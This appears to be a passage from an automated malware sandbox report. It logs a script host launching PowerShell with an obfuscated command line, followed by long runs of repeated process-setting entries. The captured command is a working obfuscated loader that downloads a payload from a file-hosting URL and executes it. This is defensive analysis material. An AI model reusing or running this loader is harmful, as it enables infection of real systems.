easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC3D7CAA push eax; ret 3_2_00007FFAAC3D7CB9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043891E pushad ; iretd 8_2_0043891F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00438C2F pushfd ; iretd 8_2_00438C30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00438DDF push esp; iretd 8_2_00438DE0
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
